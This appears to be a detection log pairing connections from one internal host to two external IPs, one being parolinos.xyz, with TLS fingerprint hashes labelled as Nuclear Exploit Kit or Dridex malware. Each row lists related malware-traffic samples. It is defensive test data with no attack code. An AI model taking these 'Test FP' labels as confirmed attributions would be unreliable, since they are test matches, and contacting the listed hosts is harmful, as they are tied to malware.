10.0.90.175 49371 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49372 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49396 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49397 176.10.125.110 parolinos.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49215 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49217 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49218 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49219 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49221 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49222 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49223 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49224 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49225 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49227 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49228 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49229 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49230 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49231 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49233 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49234 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49235 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49236 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49238 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49239 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49240 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49241 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49242 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49244 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49245 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49246 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49247 185.136.169.160 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
